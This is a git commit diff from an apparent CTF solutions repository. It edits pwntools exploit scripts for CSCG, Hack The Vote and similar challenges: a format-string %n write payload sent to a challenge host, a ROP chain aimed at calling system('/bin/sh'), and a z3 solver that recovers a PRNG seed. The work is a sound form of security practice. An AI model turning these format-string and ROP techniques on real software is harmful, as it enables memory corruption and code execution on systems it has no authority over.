dingdong
This commit is contained in:
2
.gitignore
vendored
2
.gitignore
vendored
@@ -11,3 +11,5 @@ insomnihack24/web/mathematical/.venv/
|
||||
.venv
|
||||
|
||||
__pycache__
|
||||
|
||||
core.*
|
||||
|
||||
Binary file not shown.
Binary file not shown.
@@ -9,7 +9,7 @@ LOCAL = True # Change to False if connecting remotely
|
||||
if LOCAL:
|
||||
p = process(context.binary.path)
|
||||
else:
|
||||
p = remote("39d9389ef3a77235a475377e-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
||||
p = remote("75143f5062f22bfeb9302387-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
||||
def send_payload(payload):
|
||||
p.sendline(payload)
|
||||
|
||||
@@ -21,11 +21,22 @@ def interact():
|
||||
|
||||
bug_addr = 0x40406c
|
||||
|
||||
|
||||
# Example interaction
|
||||
recv_until(b'What is your name?')
|
||||
payload = b"%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n"
|
||||
|
||||
format_string = b""
|
||||
format_string += b"%0.0s" * 5
|
||||
format_string += b"%0.0s" * 10
|
||||
format_string += b"%n"
|
||||
format_string += b"\n" * (8 - (len(format_string) % 8))
|
||||
print(len(format_string) / 8)
|
||||
format_string += p64(bug_addr)
|
||||
|
||||
print(format_string)
|
||||
|
||||
print("enter if gdb attached")
|
||||
input()
|
||||
send_payload(payload)
|
||||
send_payload(format_string)
|
||||
|
||||
interact() # Keep the shell open
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -39,7 +39,7 @@ def interact():
|
||||
|
||||
|
||||
ropchain = [
|
||||
b"3", b"2", b"6", b"13", b"12", b"11", b"1", b"-1"
|
||||
b"3", b"2", b"6", b"13", b"12", b"-1"
|
||||
]
|
||||
|
||||
|
||||
|
||||
@@ -7,5 +7,4 @@ r10 = binsh_puts_diff
|
||||
6 -> rax = 0, rsi = 0
|
||||
13 -> rdi = trash, rsi = puts
|
||||
12 -> rcx = binsh
|
||||
11 -> r8 = r9, r9 = r8
|
||||
1 -> rbx = system
|
||||
|
||||
|
||||
20
hackthevote/pwn/comma-club/exploit.py
Normal file
20
hackthevote/pwn/comma-club/exploit.py
Normal file
@@ -0,0 +1,20 @@
|
||||
|
||||
# A custom template for binary exploitation that uses pwntools.
|
||||
# Examples:
|
||||
# python exploit.py DEBUG NOASLR GDB
|
||||
# python exploit.py DEBUG REMOTE
|
||||
|
||||
from pwn import *
|
||||
|
||||
with process("./challenge") as p:
|
||||
print(p.recvuntil(b'>').decode())
|
||||
p.sendline("1".encode())
|
||||
print(p.recvuntil(b'>').decode())
|
||||
for i in range(3000):
|
||||
p.sendline("1".encode())
|
||||
print(p.recvuntil(b'>').decode())
|
||||
p.sendline(b"584057")
|
||||
print(p.recvline())
|
||||
p.interactive()
|
||||
|
||||
|
||||
@@ -6,10 +6,17 @@ import sys
|
||||
|
||||
|
||||
def ROL(X, N):
|
||||
return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64))
|
||||
if isinstance(X, z3.BitVecRef):
|
||||
return z3.RotateLeft(X,N)
|
||||
else:
|
||||
return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64))
|
||||
|
||||
|
||||
def ROR(X, N):
|
||||
return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64))
|
||||
if isinstance(X, z3.BitVecRef):
|
||||
return z3.RotateRight(X,N)
|
||||
else:
|
||||
return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64))
|
||||
|
||||
def custom_random(state):
|
||||
NEW_STATE = ROL(state,30) ^ ROR(state,12) ^ ROL(state,42) ^ ROL(state,4) ^ ROR(state,5);
|
||||
|
||||
@@ -24,6 +24,7 @@ def get_seed_for_sequence(bytesequence):
|
||||
s = z3.Solver()
|
||||
base_state = z3.BitVec("base_state", 64)
|
||||
cur_state = base_state
|
||||
s.add(base_state > 0)
|
||||
for byte in bytesequence:
|
||||
gen_byte, cur_state = custom_random(cur_state)
|
||||
s.add(gen_byte == byte)
|
||||
@@ -44,7 +45,7 @@ def gen_sequence(seed, length):
|
||||
return bytes(r)
|
||||
|
||||
|
||||
test = random.getrandbits(32).to_bytes(4)
|
||||
test = random.getrandbits(32).to_bytes(4, "little")
|
||||
seed = get_seed_for_sequence(test)
|
||||
print(seed)
|
||||
print(test)
|
||||
|
||||
@@ -7,10 +7,10 @@ The license key has the form XXXXX-XXXXX-XXXXX-XXXXX
|
||||
The template code will mostly ignore the '-' (since the binary does it mostly as well) and `license[5]` will refer to the 6th X
|
||||
|
||||
For context:
|
||||
- The binary will perform some general constraint checks on the license
|
||||
- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed
|
||||
- The constraints are described in the template and the relevant arrays extracted already
|
||||
|
||||
- The binary will perform some general constraint checks on the license
|
||||
- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed
|
||||
- The constraints are described in the template and the relevant arrays extracted already
|
||||
|
||||
To validate your license key, run the binary (it requires qemu and some dependencies, so using the Dockerfile might be easiest):
|
||||
|
||||
|
||||
Reference in New Issue
Block a user